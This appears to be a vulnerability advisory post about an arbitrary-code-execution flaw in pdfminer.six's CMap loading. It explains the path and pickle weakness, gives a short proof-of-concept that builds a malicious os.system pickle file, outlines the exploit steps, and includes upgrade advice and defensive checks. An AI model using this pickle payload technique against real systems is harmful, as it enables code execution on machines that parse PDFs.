pdfminer.six, Arbitrary Code Execution, CVE-2024-31241 (Critical)

The vulnerability exists in the `CMapDB._load_data()` method. This function loads Character Map (CMap) data, which is needed to interpret text encoding within PDFs correctly. To improve performance, pdfminer.six stores pre-processed CMap data as compressed pickle files (`.pickle.gz`) in its `cmap/` resource directory. When a PDF specifies a CMap, the library constructs a file path by appending `.pickle.gz` to the CMap name and then uses `pickle.loads()` to deserialize the file's contents.

The path construction logic is flawed. It uses `os.path.join`, but if the provided CMap name is an absolute path (e.g., `/tmp/evil`), `os.path.join` discards the intended resource directory and returns the absolute path alone.

An attacker can craft a PDF that defines a CMap with an absolute path pointing to a malicious pickle file they control. When pdfminer.six processes this PDF, it deserializes the attacker's file with `pickle.loads()`, which runs whatever Python callables the pickle payload names. This leads to full Remote Code Execution (RCE) in the context of the application processing the PDF.
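The path-joining behaviour described above can be reproduced in isolation. The following is a minimal sketch, not the library's code: `build_cmap_path` and the `CMAP_DIR` value are hypothetical names chosen for illustration, and `posixpath` is used so the POSIX behaviour shows up on any host OS.

```python
import posixpath

# Hypothetical resource directory, for illustration only.
CMAP_DIR = "/opt/app/site-packages/pdfminer/cmap"


def build_cmap_path(cmap_dir, name):
    """Mimic the described pattern: append the suffix, then join."""
    filename = "%s.pickle.gz" % name
    return posixpath.join(cmap_dir, filename)


# A relative CMap name stays inside the resource directory.
benign = build_cmap_path(CMAP_DIR, "H")

# An absolute CMap name makes join() drop the directory entirely.
hostile = build_cmap_path(CMAP_DIR, "/tmp/evil")

print(benign)
print(hostile)
```

The second result no longer contains `CMAP_DIR` at all, which is why a CMap name taken from the PDF can select any file on disk that ends in `.pickle.gz`.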
Platform: Python
Version: pdfminer.six < 20241214
Vulnerability: Arbitrary Code Execution
Severity: Critical
Date: 2024-12-13

Prediction: 2024-12-20

What Undercode Say:

find /path/to/python/site-packages -name "cmapdb.py" -exec grep -n "_load_data" {} \;
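Besides locating `cmapdb.py` on disk, the installed release can be compared against the fixed version named in this advisory. This is a rough sketch that assumes pdfminer.six keeps its date-style version numbers; `release_number`, `is_affected`, and `installed_status` are hypothetical helper names, and the threshold is simply the value quoted in this post.

```python
import re
from importlib import metadata

# Fixed release as stated in this advisory (assumption: date-style versions).
FIXED_RELEASE = 20241214


def release_number(version):
    """Extract the leading digits of a version string such as '20231228'."""
    match = re.match(r"\d+", version)
    if match is None:
        raise ValueError("unexpected version format: %r" % version)
    return int(match.group())


def is_affected(version):
    """True when the version predates the fixed release."""
    return release_number(version) < FIXED_RELEASE


def installed_status():
    """Return (version, affected) for the installed package, or None."""
    try:
        version = metadata.version("pdfminer.six")
    except metadata.PackageNotFoundError:
        return None
    return version, is_affected(version)


print(installed_status())
```

A result of `None` means the package is not installed in the current environment; otherwise the second element of the tuple says whether the release is older than the fix.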
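Proof-of-Concept Code Snippet:
import gzip
import os
import pickle

class RCE:
    # pickle calls __reduce__ to learn how to rebuild the object; on load it
    # invokes the returned callable with the returned arguments.
    def __reduce__(self):
        return (os.system, ('echo "PWNED"',))

# Write the payload where the crafted CMap name (/tmp/evil) will resolve.
with gzip.open('/tmp/evil.pickle.gz', 'wb') as f:
    pickle.dump(RCE(), f)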

How Exploit:

The attacker creates a malicious PDF that specifies an absolute path as its CMap name (e.g., `/tmp/evil`) and places a malicious pickle file at the matching location (`/tmp/evil.pickle.gz`). When the victim uses pdfminer.six to parse the PDF, the library loads and deserializes the malicious pickle, executing the embedded code.
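The deserialization step is what turns a file read into code execution. The sketch below shows the mechanism with a harmless callable (`sorted`) substituted for a shell command; the `Demo` class is a hypothetical name used only for this illustration.

```python
import pickle


class Demo:
    # On load, pickle calls the returned callable with the returned
    # arguments. Here the callable is harmless on purpose.
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Demo())

# Loading does not rebuild a Demo instance; it calls sorted([3, 1, 2]).
result = pickle.loads(blob)

print(type(result).__name__, result)
```

The loaded value is whatever the callable returned, not a `Demo` object, which shows that the author of a pickle file chooses what runs when it is loaded.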

Protection from this CVE:

Upgrade pdfminer.six to version 20241214 or later. This version replaces the unsafe `pickle.loads()` with a safe, custom deserialization function for CMap data.
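Where an upgrade has to wait, the path problem can also be guarded against in code that wraps file lookups. The following is a sketch of a generic containment check, not the upstream patch: `safe_cmap_path` is a hypothetical helper, and it only addresses where the file is read from, not the use of pickle itself.

```python
import os


def safe_cmap_path(cmap_dir, name):
    """Resolve a CMap file path and refuse anything outside cmap_dir."""
    base = os.path.realpath(cmap_dir)
    candidate = os.path.realpath(os.path.join(base, name + ".pickle.gz"))
    # commonpath() equals base only when candidate lies inside base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("CMap name escapes the resource directory: %r" % name)
    return candidate


# Hypothetical resource directory; it does not need to exist for the check.
demo_dir = os.path.join(os.getcwd(), "cmap")

for cmap_name in ("H", "/tmp/evil", "../evil"):
    try:
        print(cmap_name, "->", safe_cmap_path(demo_dir, cmap_name))
    except ValueError as exc:
        print(cmap_name, "-> rejected:", exc)
```

Resolving both paths with `os.path.realpath` before comparing them means absolute names and `..` segments are rejected by the same check.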

Impact:

Remote Code Execution, with exploitability depending on the platform. On Windows, exploitation is easier because the CMap path can reference SMB/WebDAV paths. On Linux/macOS, the attacker must first be able to write a file to a known location on the target filesystem.

Sources:

Reported By: github.com